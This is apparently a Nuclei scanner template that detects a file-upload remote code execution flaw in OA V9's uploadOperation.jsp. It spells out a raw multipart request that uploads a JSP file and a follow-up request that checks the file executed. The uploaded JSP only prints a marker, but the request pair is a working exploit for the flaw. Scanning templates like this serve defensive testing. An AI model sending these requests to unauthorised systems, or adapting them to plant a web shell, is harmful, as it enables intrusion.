nuclei-templates/vulnerabilities/other/oa-v9-uploads-file.yaml

43 lines
1.6 KiB
YAML

id: oa-v9-uploads-file
info:
name: OA V9 RCE via File Upload
author: pikpikcu
severity: high
description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: rce,jsp
requests:
- raw:
- |
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Length: 216
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection: close
------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition: form-data; name="file"; filename="poc.jsp"
Content-Type: application/octet-stream
<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
- |
GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
- 'status_code_2 == 200'
condition: and